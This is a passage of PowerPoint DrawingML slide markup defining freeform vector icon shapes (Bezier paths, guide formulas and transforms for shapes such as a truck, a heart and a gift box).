                      <a:pt x="56" y="46"/>
                      <a:pt x="56" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="44"/>
                      <a:pt x="58" y="41"/>
                      <a:pt x="58" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="36"/>
                      <a:pt x="57" y="34"/>
                      <a:pt x="56" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="27"/>
                      <a:pt x="66" y="27"/>
                      <a:pt x="66" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="26"/>
                      <a:pt x="70" y="26"/>
                      <a:pt x="70" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="30"/>
                      <a:pt x="72" y="34"/>
                      <a:pt x="72" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="43"/>
                      <a:pt x="71" y="48"/>
                      <a:pt x="70" y="52"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="51" y="7"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="7"/>
                      <a:pt x="51" y="7"/>
                      <a:pt x="51" y="7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3" y="20"/>
                      <a:pt x="41" y="19"/>
                      <a:pt x="38" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="19"/>
                      <a:pt x="33" y="20"/>
                      <a:pt x="31" y="21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9" y="6"/>
                      <a:pt x="34" y="5"/>
                      <a:pt x="38" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="5"/>
                      <a:pt x="47" y="6"/>
                      <a:pt x="51" y="7"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="7" y="26"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="29"/>
                      <a:pt x="14" y="29"/>
                      <a:pt x="14" y="29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9" y="34"/>
                      <a:pt x="19" y="36"/>
                      <a:pt x="19" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="41"/>
                      <a:pt x="19" y="44"/>
                      <a:pt x="20" y="46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5" y="48"/>
                      <a:pt x="4" y="43"/>
                      <a:pt x="4" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="34"/>
                      <a:pt x="5" y="30"/>
                      <a:pt x="7" y="26"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="25" y="70"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="66"/>
                      <a:pt x="27" y="66"/>
                      <a:pt x="27" y="66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3" y="58"/>
                      <a:pt x="36" y="58"/>
                      <a:pt x="38" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="58"/>
                      <a:pt x="43" y="58"/>
                      <a:pt x="46" y="57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51" y="70"/>
                      <a:pt x="51" y="70"/>
                      <a:pt x="51" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="72"/>
                      <a:pt x="43" y="73"/>
                      <a:pt x="38" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="73"/>
                      <a:pt x="29" y="72"/>
                      <a:pt x="25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2" name="Freeform 187">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C343B36A-310A-410D-8370-5DD74E4DEC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6120" y="2281872"/>
                <a:ext cx="211391" cy="172245"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 66"/>
                  <a:gd name="T1" fmla="*/ 29 h 54"/>
                  <a:gd name="T2" fmla="*/ 58 w 66"/>
                  <a:gd name="T3" fmla="*/ 13 h 54"/>
                  <a:gd name="T4" fmla="*/ 46 w 66"/>
                  <a:gd name="T5" fmla="*/ 13 h 54"/>
                  <a:gd name="T6" fmla="*/ 46 w 66"/>
                  <a:gd name="T7" fmla="*/ 4 h 54"/>
                  <a:gd name="T8" fmla="*/ 42 w 66"/>
                  <a:gd name="T9" fmla="*/ 0 h 54"/>
                  <a:gd name="T10" fmla="*/ 4 w 66"/>
                  <a:gd name="T11" fmla="*/ 0 h 54"/>
                  <a:gd name="T12" fmla="*/ 0 w 66"/>
                  <a:gd name="T13" fmla="*/ 4 h 54"/>
                  <a:gd name="T14" fmla="*/ 0 w 66"/>
                  <a:gd name="T15" fmla="*/ 37 h 54"/>
                  <a:gd name="T16" fmla="*/ 4 w 66"/>
                  <a:gd name="T17" fmla="*/ 41 h 54"/>
                  <a:gd name="T18" fmla="*/ 10 w 66"/>
                  <a:gd name="T19" fmla="*/ 41 h 54"/>
                  <a:gd name="T20" fmla="*/ 9 w 66"/>
                  <a:gd name="T21" fmla="*/ 46 h 54"/>
                  <a:gd name="T22" fmla="*/ 17 w 66"/>
                  <a:gd name="T23" fmla="*/ 54 h 54"/>
                  <a:gd name="T24" fmla="*/ 25 w 66"/>
                  <a:gd name="T25" fmla="*/ 46 h 54"/>
                  <a:gd name="T26" fmla="*/ 24 w 66"/>
                  <a:gd name="T27" fmla="*/ 41 h 54"/>
                  <a:gd name="T28" fmla="*/ 47 w 66"/>
                  <a:gd name="T29" fmla="*/ 41 h 54"/>
                  <a:gd name="T30" fmla="*/ 46 w 66"/>
                  <a:gd name="T31" fmla="*/ 46 h 54"/>
                  <a:gd name="T32" fmla="*/ 54 w 66"/>
                  <a:gd name="T33" fmla="*/ 54 h 54"/>
                  <a:gd name="T34" fmla="*/ 62 w 66"/>
                  <a:gd name="T35" fmla="*/ 46 h 54"/>
                  <a:gd name="T36" fmla="*/ 61 w 66"/>
                  <a:gd name="T37" fmla="*/ 41 h 54"/>
                  <a:gd name="T38" fmla="*/ 66 w 66"/>
                  <a:gd name="T39" fmla="*/ 41 h 54"/>
                  <a:gd name="T40" fmla="*/ 66 w 66"/>
                  <a:gd name="T41" fmla="*/ 29 h 54"/>
                  <a:gd name="T42" fmla="*/ 46 w 66"/>
                  <a:gd name="T43" fmla="*/ 29 h 54"/>
                  <a:gd name="T44" fmla="*/ 46 w 66"/>
                  <a:gd name="T45" fmla="*/ 19 h 54"/>
                  <a:gd name="T46" fmla="*/ 54 w 66"/>
                  <a:gd name="T47" fmla="*/ 19 h 54"/>
                  <a:gd name="T48" fmla="*/ 59 w 66"/>
                  <a:gd name="T49" fmla="*/ 29 h 54"/>
                  <a:gd name="T50" fmla="*/ 46 w 66"/>
                  <a:gd name="T51" fmla="*/ 29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54">
                    <a:moveTo>
                      <a:pt x="66" y="29"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="13"/>
                      <a:pt x="58" y="13"/>
                      <a:pt x="58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6" y="2"/>
                      <a:pt x="44" y="0"/>
                      <a:pt x="4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9" y="43"/>
                      <a:pt x="9" y="44"/>
                      <a:pt x="9" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="50"/>
                      <a:pt x="12" y="54"/>
                      <a:pt x="17" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="54"/>
                      <a:pt x="25" y="50"/>
                      <a:pt x="25" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="44"/>
                      <a:pt x="25" y="43"/>
                      <a:pt x="24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46" y="43"/>
                      <a:pt x="46" y="44"/>
                      <a:pt x="46" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="50"/>
                      <a:pt x="49" y="54"/>
                      <a:pt x="54" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="54"/>
                      <a:pt x="62" y="50"/>
                      <a:pt x="62" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="44"/>
                      <a:pt x="62" y="43"/>
                      <a:pt x="61" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="41"/>
                      <a:pt x="66" y="41"/>
                      <a:pt x="66" y="41"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="66" y="29"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="46" y="29"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="19"/>
                      <a:pt x="46" y="19"/>
                      <a:pt x="46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9" y="29"/>
                      <a:pt x="59" y="29"/>
                      <a:pt x="59" y="29"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="46" y="2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3" name="Freeform 197">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B4A5F28-62FA-446E-B2B3-C52865F29D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2269" y="1630081"/>
                <a:ext cx="211391" cy="183989"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 66"/>
                  <a:gd name="T1" fmla="*/ 19 h 58"/>
                  <a:gd name="T2" fmla="*/ 47 w 66"/>
                  <a:gd name="T3" fmla="*/ 0 h 58"/>
                  <a:gd name="T4" fmla="*/ 33 w 66"/>
                  <a:gd name="T5" fmla="*/ 6 h 58"/>
                  <a:gd name="T6" fmla="*/ 19 w 66"/>
                  <a:gd name="T7" fmla="*/ 0 h 58"/>
                  <a:gd name="T8" fmla="*/ 0 w 66"/>
                  <a:gd name="T9" fmla="*/ 19 h 58"/>
                  <a:gd name="T10" fmla="*/ 6 w 66"/>
                  <a:gd name="T11" fmla="*/ 33 h 58"/>
                  <a:gd name="T12" fmla="*/ 6 w 66"/>
                  <a:gd name="T13" fmla="*/ 33 h 58"/>
                  <a:gd name="T14" fmla="*/ 26 w 66"/>
                  <a:gd name="T15" fmla="*/ 54 h 58"/>
                  <a:gd name="T16" fmla="*/ 33 w 66"/>
                  <a:gd name="T17" fmla="*/ 58 h 58"/>
                  <a:gd name="T18" fmla="*/ 39 w 66"/>
                  <a:gd name="T19" fmla="*/ 54 h 58"/>
                  <a:gd name="T20" fmla="*/ 59 w 66"/>
                  <a:gd name="T21" fmla="*/ 33 h 58"/>
                  <a:gd name="T22" fmla="*/ 59 w 66"/>
                  <a:gd name="T23" fmla="*/ 33 h 58"/>
                  <a:gd name="T24" fmla="*/ 66 w 66"/>
                  <a:gd name="T25" fmla="*/ 19 h 58"/>
                  <a:gd name="T26" fmla="*/ 54 w 66"/>
                  <a:gd name="T27" fmla="*/ 27 h 58"/>
                  <a:gd name="T28" fmla="*/ 33 w 66"/>
                  <a:gd name="T29" fmla="*/ 48 h 58"/>
                  <a:gd name="T30" fmla="*/ 33 w 66"/>
                  <a:gd name="T31" fmla="*/ 48 h 58"/>
                  <a:gd name="T32" fmla="*/ 32 w 66"/>
                  <a:gd name="T33" fmla="*/ 48 h 58"/>
                  <a:gd name="T34" fmla="*/ 11 w 66"/>
                  <a:gd name="T35" fmla="*/ 27 h 58"/>
                  <a:gd name="T36" fmla="*/ 8 w 66"/>
                  <a:gd name="T37" fmla="*/ 19 h 58"/>
                  <a:gd name="T38" fmla="*/ 19 w 66"/>
                  <a:gd name="T39" fmla="*/ 8 h 58"/>
                  <a:gd name="T40" fmla="*/ 27 w 66"/>
                  <a:gd name="T41" fmla="*/ 12 h 58"/>
                  <a:gd name="T42" fmla="*/ 33 w 66"/>
                  <a:gd name="T43" fmla="*/ 19 h 58"/>
                  <a:gd name="T44" fmla="*/ 39 w 66"/>
                  <a:gd name="T45" fmla="*/ 12 h 58"/>
                  <a:gd name="T46" fmla="*/ 47 w 66"/>
                  <a:gd name="T47" fmla="*/ 8 h 58"/>
                  <a:gd name="T48" fmla="*/ 57 w 66"/>
                  <a:gd name="T49" fmla="*/ 19 h 58"/>
                  <a:gd name="T50" fmla="*/ 54 w 66"/>
                  <a:gd name="T51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" h="58">
                    <a:moveTo>
                      <a:pt x="66" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="9"/>
                      <a:pt x="57" y="0"/>
                      <a:pt x="47" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="0"/>
                      <a:pt x="36" y="3"/>
                      <a:pt x="33" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="3"/>
                      <a:pt x="24" y="0"/>
                      <a:pt x="19" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="0"/>
                      <a:pt x="0" y="9"/>
                      <a:pt x="0" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="25"/>
                      <a:pt x="2" y="30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6" y="54"/>
                      <a:pt x="26" y="54"/>
                      <a:pt x="26" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="56"/>
                      <a:pt x="31" y="58"/>
                      <a:pt x="33" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="58"/>
                      <a:pt x="37" y="56"/>
                      <a:pt x="39" y="54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3" y="30"/>
                      <a:pt x="66" y="25"/>
                      <a:pt x="66" y="19"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="54" y="27"/>
                    </a:move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9" y="25"/>
                      <a:pt x="8" y="22"/>
                      <a:pt x="8" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="13"/>
                      <a:pt x="13" y="8"/>
                      <a:pt x="19" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="8"/>
                      <a:pt x="24" y="10"/>
                      <a:pt x="27" y="12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1" y="10"/>
                      <a:pt x="44" y="8"/>
                      <a:pt x="47" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="8"/>
                      <a:pt x="57" y="13"/>
                      <a:pt x="57" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="22"/>
                      <a:pt x="56" y="25"/>
                      <a:pt x="54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5" name="Freeform 224">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{774EA083-2DBE-4207-9EBC-E59F432CE6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71087" y="1745564"/>
                <a:ext cx="150715" cy="150714"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 47"/>
                  <a:gd name="T1" fmla="*/ 0 h 47"/>
                  <a:gd name="T2" fmla="*/ 21 w 47"/>
                  <a:gd name="T3" fmla="*/ 0 h 47"/>
                  <a:gd name="T4" fmla="*/ 21 w 47"/>
                  <a:gd name="T5" fmla="*/ 3 h 47"/>
                  <a:gd name="T6" fmla="*/ 3 w 47"/>
                  <a:gd name="T7" fmla="*/ 3 h 47"/>
                  <a:gd name="T8" fmla="*/ 3 w 47"/>
                  <a:gd name="T9" fmla="*/ 0 h 47"/>
                  <a:gd name="T10" fmla="*/ 26 w 47"/>
                  <a:gd name="T11" fmla="*/ 0 h 47"/>
                  <a:gd name="T12" fmla="*/ 44 w 47"/>
                  <a:gd name="T13" fmla="*/ 0 h 47"/>
                  <a:gd name="T14" fmla="*/ 44 w 47"/>
                  <a:gd name="T15" fmla="*/ 3 h 47"/>
                  <a:gd name="T16" fmla="*/ 26 w 47"/>
                  <a:gd name="T17" fmla="*/ 3 h 47"/>
                  <a:gd name="T18" fmla="*/ 26 w 47"/>
                  <a:gd name="T19" fmla="*/ 0 h 47"/>
                  <a:gd name="T20" fmla="*/ 43 w 47"/>
                  <a:gd name="T21" fmla="*/ 15 h 47"/>
                  <a:gd name="T22" fmla="*/ 41 w 47"/>
                  <a:gd name="T23" fmla="*/ 15 h 47"/>
                  <a:gd name="T24" fmla="*/ 41 w 47"/>
                  <a:gd name="T25" fmla="*/ 3 h 47"/>
                  <a:gd name="T26" fmla="*/ 29 w 47"/>
                  <a:gd name="T27" fmla="*/ 3 h 47"/>
                  <a:gd name="T28" fmla="*/ 29 w 47"/>
                  <a:gd name="T29" fmla="*/ 15 h 47"/>
                  <a:gd name="T30" fmla="*/ 18 w 47"/>
                  <a:gd name="T31" fmla="*/ 15 h 47"/>
                  <a:gd name="T32" fmla="*/ 18 w 47"/>
                  <a:gd name="T33" fmla="*/ 3 h 47"/>
                  <a:gd name="T34" fmla="*/ 6 w 47"/>
                  <a:gd name="T35" fmla="*/ 3 h 47"/>
                  <a:gd name="T36" fmla="*/ 6 w 47"/>
                  <a:gd name="T37" fmla="*/ 15 h 47"/>
                  <a:gd name="T38" fmla="*/ 4 w 47"/>
                  <a:gd name="T39" fmla="*/ 15 h 47"/>
                  <a:gd name="T40" fmla="*/ 0 w 47"/>
                  <a:gd name="T41" fmla="*/ 18 h 47"/>
                  <a:gd name="T42" fmla="*/ 0 w 47"/>
                  <a:gd name="T43" fmla="*/ 44 h 47"/>
                  <a:gd name="T44" fmla="*/ 4 w 47"/>
                  <a:gd name="T45" fmla="*/ 47 h 47"/>
                  <a:gd name="T46" fmla="*/ 17 w 47"/>
                  <a:gd name="T47" fmla="*/ 47 h 47"/>
                  <a:gd name="T48" fmla="*/ 21 w 47"/>
                  <a:gd name="T49" fmla="*/ 44 h 47"/>
                  <a:gd name="T50" fmla="*/ 21 w 47"/>
                  <a:gd name="T51" fmla="*/ 27 h 47"/>
                  <a:gd name="T52" fmla="*/ 26 w 47"/>
                  <a:gd name="T53" fmla="*/ 27 h 47"/>
                  <a:gd name="T54" fmla="*/ 26 w 47"/>
                  <a:gd name="T55" fmla="*/ 44 h 47"/>
                  <a:gd name="T56" fmla="*/ 30 w 47"/>
                  <a:gd name="T57" fmla="*/ 47 h 47"/>
                  <a:gd name="T58" fmla="*/ 43 w 47"/>
                  <a:gd name="T59" fmla="*/ 47 h 47"/>
                  <a:gd name="T60" fmla="*/ 47 w 47"/>
                  <a:gd name="T61" fmla="*/ 44 h 47"/>
                  <a:gd name="T62" fmla="*/ 47 w 47"/>
                  <a:gd name="T63" fmla="*/ 18 h 47"/>
                  <a:gd name="T64" fmla="*/ 43 w 47"/>
                  <a:gd name="T65" fmla="*/ 15 h 47"/>
                  <a:gd name="T66" fmla="*/ 16 w 47"/>
                  <a:gd name="T67" fmla="*/ 44 h 47"/>
                  <a:gd name="T68" fmla="*/ 5 w 47"/>
                  <a:gd name="T69" fmla="*/ 44 h 47"/>
                  <a:gd name="T70" fmla="*/ 3 w 47"/>
                  <a:gd name="T71" fmla="*/ 42 h 47"/>
                  <a:gd name="T72" fmla="*/ 5 w 47"/>
                  <a:gd name="T73" fmla="*/ 41 h 47"/>
                  <a:gd name="T74" fmla="*/ 16 w 47"/>
                  <a:gd name="T75" fmla="*/ 41 h 47"/>
                  <a:gd name="T76" fmla="*/ 18 w 47"/>
                  <a:gd name="T77" fmla="*/ 42 h 47"/>
                  <a:gd name="T78" fmla="*/ 16 w 47"/>
                  <a:gd name="T79" fmla="*/ 44 h 47"/>
                  <a:gd name="T80" fmla="*/ 25 w 47"/>
                  <a:gd name="T81" fmla="*/ 24 h 47"/>
                  <a:gd name="T82" fmla="*/ 22 w 47"/>
                  <a:gd name="T83" fmla="*/ 24 h 47"/>
                  <a:gd name="T84" fmla="*/ 21 w 47"/>
                  <a:gd name="T85" fmla="*/ 22 h 47"/>
                  <a:gd name="T86" fmla="*/ 22 w 47"/>
                  <a:gd name="T87" fmla="*/ 21 h 47"/>
                  <a:gd name="T88" fmla="*/ 25 w 47"/>
                  <a:gd name="T89" fmla="*/ 21 h 47"/>
                  <a:gd name="T90" fmla="*/ 26 w 47"/>
                  <a:gd name="T91" fmla="*/ 22 h 47"/>
                  <a:gd name="T92" fmla="*/ 25 w 47"/>
                  <a:gd name="T93" fmla="*/ 24 h 47"/>
                  <a:gd name="T94" fmla="*/ 42 w 47"/>
                  <a:gd name="T95" fmla="*/ 44 h 47"/>
                  <a:gd name="T96" fmla="*/ 31 w 47"/>
                  <a:gd name="T97" fmla="*/ 44 h 47"/>
                  <a:gd name="T98" fmla="*/ 29 w 47"/>
                  <a:gd name="T99" fmla="*/ 42 h 47"/>
                  <a:gd name="T100" fmla="*/ 31 w 47"/>
                  <a:gd name="T101" fmla="*/ 41 h 47"/>
                  <a:gd name="T102" fmla="*/ 42 w 47"/>
                  <a:gd name="T103" fmla="*/ 41 h 47"/>
                  <a:gd name="T104" fmla="*/ 44 w 47"/>
                  <a:gd name="T105" fmla="*/ 42 h 47"/>
                  <a:gd name="T106" fmla="*/ 42 w 47"/>
                  <a:gd name="T107" fmla="*/ 4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" h="47">
                    <a:moveTo>
                      <a:pt x="3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0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="26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26" y="3"/>
                      <a:pt x="26" y="3"/>
                      <a:pt x="26" y="3"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="43" y="15"/>
                    </a:move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" y="15"/>
                      <a:pt x="0" y="16"/>
                      <a:pt x="0" y="18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2" y="47"/>
                      <a:pt x="4" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="47"/>
                      <a:pt x="17" y="47"/>
                      <a:pt x="17" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="47"/>
                      <a:pt x="21" y="45"/>
                      <a:pt x="21" y="44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6" y="27"/>
                      <a:pt x="26" y="27"/>
                      <a:pt x="26" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="44"/>
                      <a:pt x="26" y="44"/>
                      <a:pt x="26" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="45"/>
                      <a:pt x="28" y="47"/>
                      <a:pt x="30" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="47"/>
                      <a:pt x="43" y="47"/>
                      <a:pt x="43" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="47"/>
                      <a:pt x="47" y="45"/>
                      <a:pt x="47" y="44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7" y="16"/>
                      <a:pt x="45" y="15"/>
                      <a:pt x="43" y="15"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="16" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="44"/>
                      <a:pt x="3" y="43"/>
                      <a:pt x="3" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="42"/>
                      <a:pt x="4" y="41"/>
                      <a:pt x="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1"/>
                      <a:pt x="18" y="42"/>
                      <a:pt x="18" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="43"/>
                      <a:pt x="17" y="44"/>
                      <a:pt x="16" y="44"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="25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4"/>
                      <a:pt x="21" y="23"/>
                      <a:pt x="21" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="21"/>
                      <a:pt x="21" y="21"/>
                      <a:pt x="22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6" y="21"/>
                      <a:pt x="26" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="23"/>
                      <a:pt x="26" y="24"/>
                      <a:pt x="25" y="24"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="42" y="44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0" y="44"/>
                      <a:pt x="29" y="43"/>
                      <a:pt x="29" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="42"/>
                      <a:pt x="30" y="41"/>
                      <a:pt x="31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3" y="41"/>
                      <a:pt x="44" y="42"/>
                      <a:pt x="44" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="43"/>
                      <a:pt x="43" y="44"/>
                      <a:pt x="42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0CC88ED4-B750-42C0-B2A4-DC20EDCC20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91769" y="2620489"/>
                <a:ext cx="236837" cy="266197"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 58 w 74"/>
                  <a:gd name="T1" fmla="*/ 25 h 83"/>
                  <a:gd name="T2" fmla="*/ 62 w 74"/>
                  <a:gd name="T3" fmla="*/ 22 h 83"/>
                  <a:gd name="T4" fmla="*/ 68 w 74"/>
                  <a:gd name="T5" fmla="*/ 12 h 83"/>
                  <a:gd name="T6" fmla="*/ 65 w 74"/>
                  <a:gd name="T7" fmla="*/ 3 h 83"/>
                  <a:gd name="T8" fmla="*/ 58 w 74"/>
                  <a:gd name="T9" fmla="*/ 0 h 83"/>
                  <a:gd name="T10" fmla="*/ 46 w 74"/>
                  <a:gd name="T11" fmla="*/ 5 h 83"/>
                  <a:gd name="T12" fmla="*/ 36 w 74"/>
                  <a:gd name="T13" fmla="*/ 24 h 83"/>
                  <a:gd name="T14" fmla="*/ 27 w 74"/>
                  <a:gd name="T15" fmla="*/ 6 h 83"/>
                  <a:gd name="T16" fmla="*/ 18 w 74"/>
                  <a:gd name="T17" fmla="*/ 2 h 83"/>
                  <a:gd name="T18" fmla="*/ 11 w 74"/>
                  <a:gd name="T19" fmla="*/ 5 h 83"/>
                  <a:gd name="T20" fmla="*/ 12 w 74"/>
                  <a:gd name="T21" fmla="*/ 21 h 83"/>
                  <a:gd name="T22" fmla="*/ 18 w 74"/>
                  <a:gd name="T23" fmla="*/ 25 h 83"/>
                  <a:gd name="T24" fmla="*/ 0 w 74"/>
                  <a:gd name="T25" fmla="*/ 25 h 83"/>
                  <a:gd name="T26" fmla="*/ 0 w 74"/>
                  <a:gd name="T27" fmla="*/ 46 h 83"/>
                  <a:gd name="T28" fmla="*/ 5 w 74"/>
                  <a:gd name="T29" fmla="*/ 46 h 83"/>
                  <a:gd name="T30" fmla="*/ 5 w 74"/>
                  <a:gd name="T31" fmla="*/ 83 h 83"/>
                  <a:gd name="T32" fmla="*/ 68 w 74"/>
                  <a:gd name="T33" fmla="*/ 83 h 83"/>
                  <a:gd name="T34" fmla="*/ 68 w 74"/>
                  <a:gd name="T35" fmla="*/ 46 h 83"/>
                  <a:gd name="T36" fmla="*/ 74 w 74"/>
                  <a:gd name="T37" fmla="*/ 46 h 83"/>
                  <a:gd name="T38" fmla="*/ 74 w 74"/>
                  <a:gd name="T39" fmla="*/ 25 h 83"/>
                  <a:gd name="T40" fmla="*/ 58 w 74"/>
                  <a:gd name="T41" fmla="*/ 25 h 83"/>
                  <a:gd name="T42" fmla="*/ 50 w 74"/>
                  <a:gd name="T43" fmla="*/ 9 h 83"/>
                  <a:gd name="T44" fmla="*/ 58 w 74"/>
                  <a:gd name="T45" fmla="*/ 6 h 83"/>
                  <a:gd name="T46" fmla="*/ 61 w 74"/>
                  <a:gd name="T47" fmla="*/ 7 h 83"/>
                  <a:gd name="T48" fmla="*/ 58 w 74"/>
                  <a:gd name="T49" fmla="*/ 17 h 83"/>
                  <a:gd name="T50" fmla="*/ 46 w 74"/>
                  <a:gd name="T51" fmla="*/ 25 h 83"/>
                  <a:gd name="T52" fmla="*/ 41 w 74"/>
                  <a:gd name="T53" fmla="*/ 25 h 83"/>
                  <a:gd name="T54" fmla="*/ 50 w 74"/>
                  <a:gd name="T55" fmla="*/ 9 h 83"/>
                  <a:gd name="T56" fmla="*/ 14 w 74"/>
                  <a:gd name="T57" fmla="*/ 12 h 83"/>
                  <a:gd name="T58" fmla="*/ 15 w 74"/>
                  <a:gd name="T59" fmla="*/ 9 h 83"/>
                  <a:gd name="T60" fmla="*/ 18 w 74"/>
                  <a:gd name="T61" fmla="*/ 8 h 83"/>
                  <a:gd name="T62" fmla="*/ 18 w 74"/>
                  <a:gd name="T63" fmla="*/ 8 h 83"/>
                  <a:gd name="T64" fmla="*/ 23 w 74"/>
                  <a:gd name="T65" fmla="*/ 10 h 83"/>
                  <a:gd name="T66" fmla="*/ 29 w 74"/>
                  <a:gd name="T67" fmla="*/ 23 h 83"/>
                  <a:gd name="T68" fmla="*/ 29 w 74"/>
                  <a:gd name="T69" fmla="*/ 23 h 83"/>
                  <a:gd name="T70" fmla="*/ 29 w 74"/>
                  <a:gd name="T71" fmla="*/ 23 h 83"/>
                  <a:gd name="T72" fmla="*/ 16 w 74"/>
                  <a:gd name="T73" fmla="*/ 17 h 83"/>
                  <a:gd name="T74" fmla="*/ 14 w 74"/>
                  <a:gd name="T75" fmla="*/ 12 h 83"/>
                  <a:gd name="T76" fmla="*/ 32 w 74"/>
                  <a:gd name="T77" fmla="*/ 78 h 83"/>
                  <a:gd name="T78" fmla="*/ 11 w 74"/>
                  <a:gd name="T79" fmla="*/ 78 h 83"/>
                  <a:gd name="T80" fmla="*/ 11 w 74"/>
                  <a:gd name="T81" fmla="*/ 44 h 83"/>
